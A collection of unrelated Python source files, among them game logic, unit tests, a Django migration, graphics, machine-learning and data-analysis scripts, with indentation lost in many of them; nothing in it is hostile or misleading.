:param row: string of Xs and Os
"""
nice_row = ''
for i in range(0, len(row)):
nice_row += row[i]
if i != len(row) - 1:
nice_row += ' | '
print(nice_row)
def print_board(board):
"""
prints the tic-tac-toe board
:param board: list of rows
"""
for i in range(0, len(board)):
row = board[i]
print_row(row)
if i != len(board) - 1:
print('----------')
def three_in_row(board, player, start_x, start_y, dx, dy):
"""
Determines if a player has three in a row, starting
from a starting position (start_x, start_y) and going
in the direction indicated by (dx, dy). Example:
(start_x, start_y) = (2,2) means we start at the lower
right (row 2, col 2). (dx, dy) = (-1, 0) means the next
square we check is (2+dx, 2+dy) = (1,2). And the last
square we check is (1+dx, 2+dy) = (0,2). So we've just
checked the rightmost column - (2,2), (1,2), and (0,2).
:param board: list of rows
:param player: string -- either "X" or "O"
:param start_x: row to start checking at; first row is row 0
:param start_y: col to start checking at; first col is col 0
:param dx: 1 if checking downward, -1 if checking upward, 0 if checking this row
:param dy: 1 if checking rightward, -1 if checking leftward, 0 if checking this col
"""
x = start_x
y = start_y
for i in range(0, 3):
if board[x][y] != player:
return False
x += dx
y += dy
return True
def is_winner(board, player):
"""
Returns True if and only if the given player has won.
:param board: list of row strings
:param player: string - "X" or "O"
:return: True if player won; False if player lost or tied
"""
if (three_in_row(board, player, 0, 0, 1, 1)
or three_in_row(board, player, 0, 2, 1, -1)):
return True
else:
for i in range(0, 3):
if (three_in_row(board, player, 0, i, 1, 0)
or three_in_row(board, player, i, 0, 0, 1)):
return True
return False
def get_winner(board):
"""
Returns the name of the winner, or None if there is no winner
:param board: list of row strings
:return: "X" if X is winner, "O" if O is winner, None if tie
"""
if is_winner(board, 'X'):
return 'X'
elif is_winner(board, 'O'):
return 'O'
else:
return None
def confirm_result(board, expected_winner):
"""
Checks that the computed result matches the expected result.
:param board:list of row strings
:param expected_winner: Correct winner that should occur
    :return: prints "PASS" if the computed winner matches the expected result; otherwise prints "FAIL" and the correct winner.
"""
    computed = get_winner(board)
    if computed == expected_winner:
        print("PASS")
    else:
        print("FAIL")
        print("Should have returned " + str(expected_winner) + " wins")
def test_all(board_files):
"""
Iterates through all boards and computes their solutions.
Calls print_board(), get_winner() and confirm_result for each.
    :param board_files: list of tuples pairing each board (a txt file name or a hardcoded list of row strings) with its expected winner
    :return: calls confirm_result on each board to report PASS or FAIL
"""
if isinstance(board_files[0][0], str):
i = 0
for file in board_files:
board = get_board_from_file(file[0])
"""
            This section is intentionally left commented out; uncomment it to print each board and its computed result.
            By default only the PASS/FAIL output from confirm_result() is shown.
print_board(board)
winner = get_winner(board)
print("Result: %s wins" % (str(winner)))
"""
confirm_result(board, board_files[i][1])
i += 1
else:
i = 0
for board in board_files:
"""
            This section is intentionally left commented out; uncomment it to print each board and its computed result.
            By default only the PASS/FAIL output from confirm_result() is shown.
print_board(board[0])
winner = get_winner(board[0])
print("Result: %s wins" % (str(winner)))
"""
confirm_result(board[0], board_files[i][1])
i += 1
def main():
"""
contains list of tuples which each contain
(board_file, expected result)
:return: calls test_all(board_files)
"""
board_files = [
("X_wins.txt" , "X"),
("X_wins2.txt" , "X"),
("X_wins3.txt" , "X"),
("O_wins.txt" , "O"),
("O_wins2.txt" , "O"),
("Tie1.txt" , None)
]
test_all(board_files)
def main2():
"""
    contains list of tuples with each tuple containing
(hardcoded_board, expected result)
:return: calls test_all(hardcoded_boards)
"""
Xwins_board = [
"XXX",
"OOX",
"XXO"
]
Xwins2_board = [
"XOX",
"XXO",
"OOX"
]
Xwins3_board = [
"OOX",
"XOX",
"OXX"
]
Owins_board = [
"OOO",
"OXX",
"XXO"
]
Owins2_board = [
"XXO",
"XOO",
"OXX"
]
Tie_board = [
"OXO",
"XXO",
"OOX"
]
hardcoded_boards = [
(Xwins_board , "X"),
(Xwins2_board, "X"),
(Xwins3_board , "X"),
(Owins_board , "O"),
(Owins2_board , "O"),
(Tie_board , None)
]
test_all(hardcoded_boards)
if __name__ == "__main__":
main()
|
class Board:
flower_space = "X"
none_space = "--"
column_space = " | "
empty_space = "O"
tiles = [[]]
player_path_row_column = {}
player_path_row_column[1] = {
1: [3, 0],
2: [2, 0],
3: [1, 0],
4: [0, 0],
5: [0, 1],
6: [1, 1],
7: [2, 1],
8: [3, 1],
9: [4, 1],
10: [5, 1],
11: [6, 1],
12: [7, 1],
13: [7, 0],
14: [6, 0],
15: [5,0]
}
player_path_row_column[2] = {
1: [3, 2],
2: [2, 2],
3: [1, 2],
4: [0, 2],
5: [0, 1],
6: [1, 1],
7: [2, 1],
8: [3, 1],
9: [4, 1],
10: [5, 1],
11: [6, 1],
12: [7, 1],
13: [7, 2],
14: [6, 2],
15: [5,2]
}
def __init__(self, h, w):
self.tiles = [[self.empty_space for x in range(w)] for y in range(h)]
self.tiles[0][0] = self.flower_space
self.tiles[0][2] = self.flower_space
self.tiles[4][0] = self.none_space
self.tiles[5][0] = self.none_space
self.tiles[4][2] = self.none_space
self.tiles[5][2] = self.none_space
self.tiles[3][1] = self.flower_space
self.tiles[6][0] = self.flower_space
self.tiles[6][2] = self.flower_space
self.last_tile_location = len(self.player_path_row_column[1])
def to_text(self):
display = ""
for i in range(0, len(self.tiles)):
for j in range(0, len(self.tiles[i])):
if j != 0:
display = display + self.column_space
display = display + self.tiles[i][j]
display = display + "\n"
return display
def place_token(self, token, location):
row_column = {}
row_column = self.get_player_path(token)
if location not in row_column:
raise Exception(
"place_token error. self: {0} token: {1} location{2}".format(
self, token, location
)
)
if location == self.last_tile_location :
            return # we can pretend that we move it by not updating that board piece
row_index = row_column[location][0]
column_index = row_column[location][1]
self.tiles[row_index][column_index] = token.owner_symbol
def get_player_path(self, token):
if token.owner == "Player 1":
return self.player_path_row_column[1]
elif token.owner == "Player 2":
return self.player_path_row_column[2]
else :
            raise Exception("get_player_path error {0}".format(token))
    def find_all_player_locations(self, token):
        """
        Returns the places on the board (e.g. 1-14) that a player's tokens occupy.
        """
location_list = []
player_path = self.get_player_path(token)
for k,v in player_path.items():
row = v[0]
col = v[1]
if self.tiles[row][col] == token.owner_symbol:
location_list.append(self.find_location_from_coord(token, row, col))
return location_list
def find_location_from_coord(self,token, i, j):
if token.owner == "Player 1":
for k,v in self.player_path_row_column[1].items():
if v[0] == i and v[1]==j:
return k
elif token.owner == "Player 2":
for k,v in self.player_path_row_column[2].items():
if v[0] == i and v[1]==j:
return k
else :
raise Exception("find_location_from_coord error finding owner {0} for coord {1}:{2}".format(token, i, j))
def place_token_is_valid(self, token, location):
if location == 0:
return False
row_column = {}
row_column = self.get_player_path(token)
if location not in row_column:
return False
row = row_column[location][0]
column = row_column[location][1]
if self.tiles[row][column] in [token.owner_symbol]:
return False
return True
def reset_tile(self, token, location):
player_path = self.get_player_path(token)
if location not in player_path:
raise Exception("reset_tile error {0} - {1}".format(token, location))
coordinate_to_reset = player_path[location]
row = coordinate_to_reset[0]
col = coordinate_to_reset[1]
flower_spaces = [
[0,0],
[0,2],
[3,1],
[6,2]
]
if coordinate_to_reset in flower_spaces :
self.tiles[row][col] = self.flower_space
return
else :
self.tiles[row][col] = self.empty_space
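# Minimal usage sketch (not part of the original file): _DemoToken is a hypothetical
# stand-in exposing the two attributes Board expects (owner and owner_symbol).
class _DemoToken:
    def __init__(self, owner, owner_symbol):
        self.owner = owner
        self.owner_symbol = owner_symbol
if __name__ == "__main__":
    board = Board(8, 3)  # 8 rows x 3 columns, matching the coordinates used above
    player_one = _DemoToken("Player 1", "P1")
    if board.place_token_is_valid(player_one, 4):
        board.place_token(player_one, 4)
    print(board.to_text())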
|
# Generated by Django 3.0.2 on 2020-02-13 14:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Profile', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='profile',
old_name='aellido_paterno',
new_name='apellido_paterno',
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
from analyse_immo.database import Database
from analyse_immo.bien_immo import Bien_Immo
from analyse_immo.lot import Lot
from analyse_immo.charge import Charge
from analyse_immo.credit import Credit
from analyse_immo.impots.annexe_2044 import Annexe_2044
@unittest.skip('fixme')
class TestImpotRegimeReel(unittest.TestCase):
def setUp(self):
self._database = Database()
self.credit = Credit(0, 0, 0, 0, None, 0, 0)
def testInit(self):
_ = Annexe_2044(self._database, None, None, 0)
def testBaseImpossable(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
irr = Annexe_2044(self._database, bien_immo, self.credit, 0)
        # No charges yet
self.assertAlmostEqual(irr.base_impossable, 6000)
charge = Charge(lot)
lot.charge = charge
        # Co-ownership fees (copropriete)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.base_impossable, 5000)
        # Property tax (taxe fonciere)
charge.add(charge.deductible_e.copropriete, 800)
self.assertAlmostEqual(irr.base_impossable, 4200)
        # Landlord insurance (PNO)
charge.add(charge.deductible_e.prime_assurance, 100)
self.assertAlmostEqual(irr.base_impossable, 4100)
        # Other charges
charge.add(Charge.charge_e.provision_travaux, 0.01)
charge.add(Charge.charge_e.vacance_locative, 1 / 12)
self.assertAlmostEqual(irr.base_impossable, 4100)
        # Rental agency management fees
charge.add(Charge.charge_e.agence_immo, 0.05)
self.assertAlmostEqual(irr.base_impossable, 3800)
def testRevenuFoncierImpossableA(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
charge = Charge(lot)
lot.charge = charge
irr = Annexe_2044(self._database, bien_immo, self.credit, 0)
self.assertAlmostEqual(irr.revenu_foncier_impossable, 0)
irr = Annexe_2044(self._database, bien_immo, self.credit, 0.11)
self.assertAlmostEqual(irr.revenu_foncier_impossable, 660)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.revenu_foncier_impossable, 550)
@unittest.skip('todo')
def testRevenuFoncierImpossableB(self):
'''
Take into account credit
'''
pass
def testPrelevementSociaux(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
charge = Charge(lot)
lot.charge = charge
irr = Annexe_2044(self._database, bien_immo, self.credit, 0.11)
self.assertAlmostEqual(irr.prelevement_sociaux_montant, 1032)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.prelevement_sociaux_montant, 860)
def testImpotTotal(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
charge = Charge(lot)
lot.charge = charge
irr = Annexe_2044(self._database, bien_immo, self.credit, 0.11)
self.assertAlmostEqual(irr.impot_total, 1032 + 660)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.impot_total, 860 + 550)
if __name__ == '__main__':
unittest.main()
|
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import sys
def ROUND(a):
return int(a+0.5)
k=0
def init():
glClearColor(0.0,1.0,1.0,0.0)
glPointSize(2.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(0.0,600.0,0.0,600.0)
def setPixel(x,y):
glBegin(GL_POINTS)
glVertex2i(x,y)
glEnd()
glFlush()
def readvertices():
global n,x0,y0,x1,y1,x2,y2
    x0=int(input("Enter 1st_x: "))
    y0=int(input("Enter 1st_y: "))
    x1=int(input("Enter 2nd_x: "))
    y1=int(input("Enter 2nd_y: "))
    x2=int(input("Enter 3rd_x: "))
    y2=int(input("Enter 3rd_y: "))
    n=int(input("Enter level of sierpinski: "))
def lineDDA(x0,y0,xEnd,yEnd):
delta_x=xEnd-x0
delta_y=yEnd-y0
dx=abs(xEnd-x0)
dy=abs(yEnd-y0)
x,y=x0,y0
steps=dx if dx>dy else dy
if steps !=0:
change_x=dx/float(steps)
change_y=dy/float(steps)
else:
change_x=0
change_y=0
setPixel(ROUND(x),ROUND(y))
    for k in range(int(steps)):
if delta_x >= 0:
x+=change_x
else:
x-=change_x
if delta_y >= 0:
y+=change_y
else:
y-=change_y
setPixel(ROUND(x),ROUND(y))
def draw_triangle(x0,y0,x1,y1,x2,y2):
lineDDA(x0,y0,x1,y1)
lineDDA(x1,y1,x2,y2)
lineDDA(x0,y0,x2,y2)
def sierpensky(x0,y0,x1,y1,x2,y2,k):
k+=1
if k>n:
return
mx0=(x0+x1)/2
my0=(y0+y1)/2
mx1=(x1+x2)/2
my1=(y1+y2)/2
mx2=(x2+x0)/2
my2=(y2+y0)/2
glColor3f(1.0,1.0,1.0)
draw_triangle(mx0,my0,mx1,my1,mx2,my2)
sierpensky(x0,y0,mx0,my0,mx2,my2,k)
sierpensky(mx0,my0,x1,y1,mx1,my1,k)
sierpensky(mx1,my1,x2,y2,mx2,my2,k)
def Display():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0,0.0,0.0)
draw_triangle(x0,y0,x1,y1,x2,y2)
sierpensky(x0,y0,x1,y1,x2,y2,k)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(600,600)
glutInitWindowPosition(50,50)
    glutCreateWindow(b"Sierpinski Triangle")
readvertices()
glutDisplayFunc(Display)
init()
glutMainLoop()
main()
|
class List(list):
def __init__(self):
        super(List, self).__init__()
|
import config
import core_functions
import datetime
import time
|
def cal_num(*args):
return sum(args), sum(args)/len(args)
Sum, Mean = cal_num(10, 20, 30)
print("3 arguments: (10, 20, 30)")
print(f"Sum: {Sum}, Mean: {Mean}")
Sum, Mean = cal_num(10, 20, 30, 40, 50)
print("5 arguments: (10, 20, 30, 40, 50)")
print(f"Sum: {Sum}, Mean: {Mean}")
|
# -*- coding: utf-8 -*-
class Solution:
def findRepeatedDnaSequences(self, s):
result = set()
if len(s) < 11:
return []
seen = set([s[:10]])
for i in range(10, len(s)):
sequence = s[i - 9 : i + 1]
if sequence in seen:
result.add(sequence)
seen.add(sequence)
return list(result)
if __name__ == "__main__":
solution = Solution()
expected = ["AAAAACCCCC", "CCCCCAAAAA"]
result = solution.findRepeatedDnaSequences("AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT")
assert sorted(expected) == sorted(result)
|
from keygenerator import *
from ..translators.numberedalphabettranslator import *
import random
class NumberKeyGenerator(KeyGenerator):
def __init__(self, max_number=26, rand_func=lambda x: x ** 6, **kwargs):
"""To be used with CaesarTranslator"""
KeyGenerator.__init__(self, **kwargs)
self.max_number = max_number
self.randFunc = rand_func
def getRandomKey(self):
return random.randint(0, self.max_number - 1)
def getAllKeys(self):
return xrange(self.max_number)
def mutateKey(self, key):
"""Change randFunc for different transformation number after random.random"""
return (key + int(self.randFunc(random.random() + 1))) % self.max_number
|
"""
Author: Zhen Dong
Time : 2020-09-19 23:19
"""
import torch
import torch.nn as nn
# 4ms * 15
conv1_ksize = (15, 1)
# 20 channels
conv2_ksize = (1, 20)
conv1_isize = 1
conv1_osize = 5
conv2_isize = conv1_osize
conv2_osize = 10
fc1_dropout_p = 0.3
fc2_dropout_p = 0.3
fc1_isize = 610
fc1_osize = 128
fc2_isize = fc1_osize
fc2_osize = 1
class ConvLayer(nn.Module):
def __init__(self, isize, osize, ksize, maxpool=None):
super(ConvLayer, self).__init__()
self.layer = nn.Sequential(
nn.Conv2d(isize, osize, ksize),
nn.BatchNorm2d(osize),
nn.ReLU()
)
# optional maxpool
self.maxpool = None
if maxpool:
self.maxpool = nn.MaxPool2d(maxpool)
def forward(self, x):
x = self.layer(x)
if self.maxpool:
x = self.maxpool(x)
return x
class LinearLayer(nn.Module):
def __init__(self, isize, osize, dropout_p, norm=True, activate=True):
super(LinearLayer, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
self.linear = nn.Linear(isize, osize)
self.batch_norm = nn.BatchNorm1d(osize) if norm else None
self.activate = nn.ReLU() if activate else None
def forward(self, x):
x = self.dropout(x)
x = self.linear(x)
if self.batch_norm:
x = self.batch_norm(x)
if self.activate:
x = self.activate(x)
return x
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.in_batch_norm = nn.BatchNorm2d(conv1_isize)
self.feat_extractor = nn.Sequential(
ConvLayer(conv1_isize, conv1_osize, conv1_ksize),
ConvLayer(conv2_isize, conv2_osize, conv2_ksize)
)
self.fc_layer = nn.Sequential(
LinearLayer(fc1_isize, fc1_osize, fc1_dropout_p),
LinearLayer(fc2_isize, fc2_osize, fc2_dropout_p, norm=False, activate=False),
nn.Sigmoid()
)
def forward(self, x):
x = self.in_batch_norm(x)
x = self.feat_extractor(x)
# flatten the input
batch_size = x.size()[0]
x = x.view(batch_size, -1)
# fc layer
x = self.fc_layer(x)
return x
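# Minimal smoke-test sketch (not part of the original file). The input shape is an
# assumption: with conv kernels of (15, 1) and (1, 20), a (batch, 1, 75, 20) input
# flattens to 10 * 61 * 1 = 610 features, which matches fc1_isize above.
if __name__ == "__main__":
    model = ConvNet()
    dummy = torch.randn(2, conv1_isize, 75, 20)  # batch of 2 so BatchNorm1d works in train mode
    out = model(dummy)
    print(out.shape)  # expected torch.Size([2, 1]), values in (0, 1) from the sigmoid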
|
import scrapy
from scrapy.loader.processors import TakeFirst
class BooksImagesItem(scrapy.Item):
file_urls = scrapy.Field()
files = scrapy.Field()
file_name = scrapy.Field(
output_processor=TakeFirst()
)
|
import numpy as np
import json
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import TfidfVectorizer
STOP_WORDS = stopwords.words("english")
# get map from userid -> clusterid
def get_user2cluster(filepath):
with open(filepath, "r") as f:
content = f.readlines()
f.close()
user2cluster = {}
for line in content:
tmp = line.split(" ")
userid = long(tmp[0])
clusterid = int(tmp[1])
user2cluster[userid] = clusterid
return user2cluster
# get map from clusterid -> array of member id's
def get_cluster2users(filepath):
with open(filepath, "r") as f:
content = f.readlines()
f.close()
cluster2users = {}
for line in content:
tmp = line.split(" ")
userid = long(tmp[0])
clusterid = int(tmp[1])
if clusterid in cluster2users:
cluster2users[clusterid].append(userid)
else:
cluster2users[clusterid] = [userid]
return cluster2users
# get map from userid -> text of all tweets
def get_user2tweets(filepath):
user2tweets = {}
with open(filepath, 'rb') as f:
i = 0
for line in f:
tweet = json.loads(line)
user_id = tweet['user']['id']
text = tweet['text'].lower().replace("\n", "")
if user_id not in user2tweets:
user2tweets[user_id] = ""
user2tweets[user_id] = user2tweets[user_id] + " " + text
f.close()
return user2tweets
# get map from userid -> string of hashtags used (string separated)
def get_user2hashtags(filepath):
with open(filepath, "r") as f:
content = f.readlines()
f.close()
user2hashtags = {}
for line in content:
tmp = line.split(" ")
userid = long(tmp[0])
hashtag = tmp[1]
if userid in user2hashtags:
user2hashtags[userid] = user2hashtags[userid] + " " + hashtag
else:
user2hashtags[userid] = hashtag
return user2hashtags
# randomly sample from given cluster
def select_from_cluster(cluster2users, npeople, clusterid):
cluster_members = np.array(cluster2users[clusterid])
return np.random.choice(cluster_members, size=npeople, replace=False)
# sample npeople from 2 largest clusters
# computer similarity of their associated documents
def get_similarity(cluster2users, user2text, npeople, stop=True):
cluster_biggest = -1
cluster_2biggest = -1
cluster_biggest_id = None
cluster_2biggest_id = None
for clusterid in cluster2users.keys():
users = cluster2users[clusterid]
if len(users) >= cluster_biggest:
cluster_2biggest = cluster_biggest
cluster_biggest = len(users)
cluster_2biggest_id = cluster_biggest_id
cluster_biggest_id = clusterid
elif len(users) > cluster_2biggest:
cluster_2biggest = len(users)
cluster_2biggest_id = clusterid
userset1 = select_from_cluster(cluster2users, npeople, cluster_biggest_id)
userset2 = select_from_cluster(cluster2users, npeople, cluster_2biggest_id)
docs = []
for user in userset1:
if user in user2text:
docs.append(user2text[user])
else:
docs.append("")
for user in userset2:
if user in user2text:
docs.append(user2text[user])
else:
docs.append("")
vect = TfidfVectorizer(min_df=1,stop_words=STOP_WORDS if stop else None)
tfidf = vect.fit_transform(docs)
sim = (tfidf * tfidf.T).A
within1 = np.array(sim[:npeople, :npeople])
within2 = np.array(sim[npeople:, npeople:])
between = np.array(sim[:npeople, npeople:])
within1_avg = (np.sum(within1) - np.trace(within1)) / (npeople * npeople - npeople)
    within2_avg = (np.sum(within2) - np.trace(within2)) / (npeople * npeople - npeople)
between_avg = np.mean(between)
return sim, within1_avg, within2_avg, between_avg
# perform analysis
# setup
DATA = "/media/rhenwood39/OS/6850_proj/efilter/resultsFirst1M.json"
SOURCE = "./1MRichieJson/"
cluster_filepaths = ["retweet_rm_clust.txt", "mentions_rm_clust.txt", "replies_rm_clust.txt", "retweet_rm_lelp_clust.txt", "mentions_rm_lelp_clust.txt", "replies_rm_lelp_clust.txt"]
output = ["retweet_labprop", "mentions_labprop", "replies_labprop", "retweet_modlabprop", "mentions_modlabprop", "replies_modlabprop"]
# get tweets
user2tweets = get_user2tweets(DATA)
# wi1s = []
# wi2s = []
# bws = []
# cluster sim
# for file in cluster_filepaths:
# cluster2users = get_cluster2users(SOURCE + file)
# sim,wi1,wi2,bw = get_similarity(cluster2users, user2docs, 2000)
# wi1s.append(wi1)
# wi2s.append(wi2)
# bws.append(bw)
# with open(SOURCE + "cosine_sim_analysis_hashtag.csv", "w") as f:
# f.write("source, within1, within2, between\n")
# for i in range(len(cluster_filepaths)):
# f.write(cluster_filepaths[i] + ", " + str(wi1s[i]) + ", " + str(wi2s[i]) + ", " + str(bws[i]) + "\n")
# f.close()
# get tweets for each cluster
for i in range(len(cluster_filepaths)):
file = cluster_filepaths[i]
out = output[i]
# get clusters
cluster2users = get_cluster2users(SOURCE + file)
# get 2 biggest clusters
cluster_biggest = -1
cluster_2biggest = -1
cluster_biggest_id = None
cluster_2biggest_id = None
for clusterid in cluster2users.keys():
users = cluster2users[clusterid]
if len(users) >= cluster_biggest:
cluster_2biggest = cluster_biggest
cluster_biggest = len(users)
cluster_2biggest_id = cluster_biggest_id
cluster_biggest_id = clusterid
elif len(users) > cluster_2biggest:
cluster_2biggest = len(users)
cluster_2biggest_id = clusterid
cluster1 = np.random.choice(np.array(cluster2users[cluster_biggest_id]), size=20, replace=False)
cluster2 = np.random.choice(np.array(cluster2users[cluster_2biggest_id]), size=20, replace=False)
with open("./ClusterTweets/" + out + "1.txt", "w") as f:
for i in range(len(cluster1)):
user = cluster1[i]
f.write(u"TWEET " + str(i) + u"\n")
f.write((user2tweets[user] + u"\n").encode("utf8"))
f.write(u"\n***********************************************************\n")
f.close()
with open("./ClusterTweets/" + out + "2.txt", "w") as f:
for i in range(len(cluster2)):
user = cluster2[i]
f.write(u"TWEET " + str(i) + u"\n")
f.write((user2tweets[user] + u"\n").encode("utf8"))
f.write(u"\n***********************************************************\n")
f.close()
|
import unittest
from katas.kyu_8.regex_count_lowercase_letters import lowercase_count
class LowercaseCountTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(lowercase_count('abc'), 3)
def test_equals_2(self):
self.assertEqual(lowercase_count('abcABC123'), 3)
def test_equals_3(self):
self.assertEqual(lowercase_count(
'abcABC123!@#$%^&*()_-+=}{[]|\':;?/>.<,~'), 3)
def test_equals_4(self):
self.assertEqual(lowercase_count(''), 0)
def test_equals_5(self):
self.assertEqual(lowercase_count(
'ABC123!@#$%^&*()_-+=}{[]|\':;?/>.<,~'), 0)
def test_equals_6(self):
self.assertEqual(lowercase_count('abcdefghijklmnopqrstuvwxyz'), 26)
|
# Initiates the database
import pymongo
client = pymongo.MongoClient("mongodb+srv://dn54321:<password>@cluster0-kixdi.mongodb.net/test?retryWrites=true&w=majority")
db = client.test
|
#coding:utf-8
from moteur import *
mversion=[1.1]
titre=""
description=""
intro="debut"
fin="fin"
########
objet=Obj()
objet.nom='objet'
Endroit=Lieu()
Endroit.nom='endroit'
Endroit.objs.append(objet)
########
perso=Perso()
perso.nom=""
perso.lieu_actu=Endroit
print(intro)
inp("")
main(perso,objet)
inp("")
print(fin)
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Copied from env/doc/make_rst_table.py
http://stackoverflow.com/questions/11347505/what-are-some-approaches-to-outputting-a-python-data-structure-to-restructuredte
"""
import os, logging, numpy as np
log = logging.getLogger(__name__)
def make_rst_table(grid):
max_cols = [max(out) for out in map(list, zip(*[[len(item) for item in row] for row in grid]))]
rst = table_div(max_cols, 1)
for i, row in enumerate(grid):
header_flag = i == 0 or i == len(grid)-1
rst += normalize_row(row,max_cols)
if header_flag or row[0].strip()[-1] == "]":
rst += table_div(max_cols, header_flag )
return rst
def table_div(max_cols, header_flag=1):
out = ""
if header_flag == 1:
style = "="
else:
style = "-"
for max_col in max_cols:
out += max_col * style + " "
out += "\n"
return out
def normalize_row(row, max_cols):
"""
Padding to equalize cell string lengths
"""
r = ""
for i, max_col in enumerate(max_cols):
r += row[i] + (max_col - len(row[i]) + 1) * " "
return r + "\n"
def fmt(cellkind, prefix="", trim="key"):
cell, kind = cellkind
# indicates a skipped field
if kind is None:
return None
if kind == "f":
fmt = "%5.2f"
elif kind == "i":
fmt = "%d"
else:
fmt = "%s"
pass
if type(cell) is str or type(cell) is np.string_:
s = str(cell)
if s == trim:
return prefix
elif s.startswith(prefix):
return s[len(prefix):]
else:
return s
return fmt % cell
def recarray_as_rst(ra, trim="key", skip=[]):
"""
Expecting recarray with dtype of form:
dtype=[('key', 'S64'), ('X', '<f4'), ('Y', '<f4'), ('Z', '<f4'), ('T', '<f4'), ('A', '<f4'), ('B', '<f4'), ('C', '<f4'), ('R', '<f4')]
======================= ===== ===== ===== ===== ===== ===== ===== =====
PmtInBox/torch X Y Z T A B C R
======================= ===== ===== ===== ===== ===== ===== ===== =====
[TO] BT SA 1.15 1.00 0.00 0.00 1.06 1.03 0.00 1.13
TO [BT] SA 1.15 1.00 1.06 0.91 1.06 1.03 0.00 1.13
TO BT [SA] 0.97 1.02 1.05 0.99 1.06 1.03 0.00 1.25
[TO] BT SD 0.91 0.73 0.56 0.56 0.98 1.09 0.56 0.88
TO [BT] SD 0.91 0.73 0.81 0.89 0.98 1.09 0.56 0.88
TO BT [SD] 0.99 0.83 0.97 0.99 0.98 1.09 0.56 0.89
[TO] BT BT SA 0.95 0.82 0.04 0.04 0.97 0.89 0.04 0.57
TO [BT] BT SA 0.95 0.82 0.70 0.50 0.97 0.89 0.04 0.57
TO BT [BT] SA 0.91 0.94 0.43 0.60 0.97 0.89 0.04 0.05
TO BT BT [SA] 0.93 0.87 0.04 0.35 0.97 0.89 0.04 0.72
======================= ===== ===== ===== ===== ===== ===== ===== =====
"""
grid = []
    kinds = list(map(lambda k: None if k in skip else ra.dtype[k].kind, ra.dtype.names))  # list() so it can be re-iterated for every row below
kfield = getattr(ra, trim, None)
if kfield is None:
prefix = ""
else:
        prefix = os.path.commonprefix([str(k) for k in kfield])
pass
label_kinds = [None if k in skip else "S" for k in ra.dtype.names] # all "S" for string, or None for skips
    grid.append(list(filter(None, map(lambda _: fmt(_, prefix, trim), zip(ra.dtype.names, label_kinds)))))
for i in range(len(ra)):
        grid.append(list(filter(None, map(lambda _: fmt(_, prefix, trim), zip(ra[i], kinds)))))
pass
return make_rst_table(grid)
def test_make_rst_table():
print(make_rst_table( [['Name', 'Favorite Food', 'Favorite Subject'],
['Joe', 'Hamburgrs', 'I like things with really long names'],
['Jill', 'Salads', 'American Idol'],
['Sally', 'Tofu', 'Math']]))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
path = os.path.expandvars("$TMP/stat.npy")
log.info("path %s " % path )
stat = np.load(path).view(np.recarray)
print(recarray_as_rst(stat))
|
from django.shortcuts import render
from weekapp.models import Week
def week(request):
weeks = Week.objects.all()
context = {
'weeks': weeks,
'page_title': 'weeks',
}
return render(request, 'weekapp/week.html', context)
|
from typing import List
from daos.erequest_dao import ErequestDAOf
from entities.erequest import Erequest
from exceptions.resource_not_found import ResourceNotFound
class ErequestDaoLocal(ErequestDAOf):
id_maker = 0
erequest_table = {}
def create_request(self, erequest: Erequest) -> Erequest:
ErequestDaoLocal.id_maker += 1
erequest.employee_id = ErequestDaoLocal.id_maker
ErequestDaoLocal.erequest_table[erequest.employee_id] = erequest
return erequest
def get_all_requests(self) -> List[Erequest]:
pass
def get_request_by_eid(self, employee_id: int) -> Erequest:
pass
def update_request(self, erequest: Erequest, employee_id: int, erequest_id: int) -> Erequest:
pass
def delete_request(self, erequest_id: int) -> bool:
pass
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from typing import Sequence
import pytest
from pants.backend.python import target_types_rules
from pants.backend.python.lint.pydocstyle.rules import PydocstyleRequest
from pants.backend.python.lint.pydocstyle.rules import rules as pydocstyle_rules
from pants.backend.python.lint.pydocstyle.subsystem import PydocstyleFieldSet
from pants.backend.python.lint.pydocstyle.subsystem import rules as pydocstyle_subsystem_rules
from pants.backend.python.target_types import PythonSourcesGeneratorTarget
from pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints
from pants.core.goals.lint import LintResult, Partitions
from pants.core.util_rules import config_files, source_files
from pants.engine.addresses import Address
from pants.engine.target import Target
from pants.testutil.python_interpreter_selection import all_major_minor_python_versions
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*pydocstyle_rules(),
*pydocstyle_subsystem_rules(),
*source_files.rules(),
